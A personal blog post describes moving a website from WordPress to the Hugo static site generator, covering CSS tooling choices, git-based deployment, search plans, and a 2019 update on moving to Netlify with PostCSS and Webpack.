Hugo's speediness is undoubtedly due in part to Go, as in Golang, a newer language originally developed at Google. The beauty of Hugo has been that I've not had to become a master of Golang to understand it. Hugo's templating resembles AngularJS or Handlebars in its love of double curly braces {{ .Title }} and similar setups. Fairly intuitive, although I'm definitely still learning.

For screenshots of the site, head over here or the live site here. Update: all sites I maintain, including this one are currently using Hugo + Netlify.

Design Details

The switch from Wordpress to Hugo is a forward-looking attempt to minimize the amount of maintenance I have to do on the site, and to enable faster changes. While finishing the site took several months—working typically at most an hour a day on it—the process of iterating on the design and testing features was super quick.

Almost all of the testing took place locally, on my computer, and with Hugo's speedy page regeneration I was able to make changes very quickly, without having to debug strange bits of PHP or Javascript code in the process.

Otherwise I went straight from a super simple hand-drawn mockup of the site structure to building out a prototype HTML version within Hugo.

For a while I had the silly idea of coding all the CSS by hand, but that created resistance and getting started on that part of the project was delayed weeks because of it...then I used Skeleton as a base and everything went a billion times faster.

The bulk of designing was getting the initial layout working within the CSS, done through Stylus, and then tweaking it as needed. All done mobile-first, of course.

The one major pivot was with the grid system. Originally I used Skeleton's built-in grids, but I wasn't happy with the way it was working across the entire site, so I switched back to using Jeet, which integrates nicely with Stylus.


What I'm particularly enjoying now is how I can push new posts and changes to the site. I still do all my writing and code locally, testing it without even necessarily needing an internet connection. Once I've finalized the new changes all I have to do is use Git to push the newest changes to the server, and a script will automatically run Hugo to regenerate the folder. Fantastic.

Future Plans

The one major downside to a static site is the lack of a search function. Right now using a Google custom search is a good work around...but Hugo now supports data files (JSON specifically), which should in theory allow for an intuitive site search that still doesn't require a database. We'll see soon(ish) enough.

All in all, while there's certainly a learning curve, I highly recommend Hugo for building a CMS-free site. While I'm enjoying Ghost for this blog, there's a distinct possibility of transitioning this to Hugo as well in the future. Futzing with logins and updates just gets in the way of writing when you're doing this solo.


Yup, decided to transition this site onto Hugo as well, with a new design! In some ways less fancy than the original theme (no jQuery animation tricks added as of yet) but I like it. There's plenty of work to be done around making pagination prettier, adding some CSS animations, and gradual tweaks to typography and styling, but it's a good start.

Larger update (2019 edition)

Much has changed in terms of the plumbing of this site and my others. While all of them are still built using Hugo, since writing this I've transitioned all of my hosting to Netlify, and as part of that transition changed the build process to be based on their Victor Hugo boilerplate. As part of that transition the two major changes have been to my CSS pre-processor, from Stylus to PostCSS (I love the modularity, though sometimes getting specific plugins to function can be finnicky) and my task runner and builder from Gulp to Webpack. Overall I'm happy with the new setup, as now I can simply push changes to my git repo staged, in this case, on Bitbucket and Netlify automatically rebuilds the site each time it detects a change, plus gives me logs of errors if anything in the build process fails. So far so good, with the only significant challenge I'm finding with this method is cleanly updating the Victor Hugo boilerplate files (package.json and sometimes the webpack config) without losing my own changes to the tooling. Doesn't happen often but it does add a few hours of tinkering when it does cause issues, but that's the life of anything that relies on Node packages for functionality.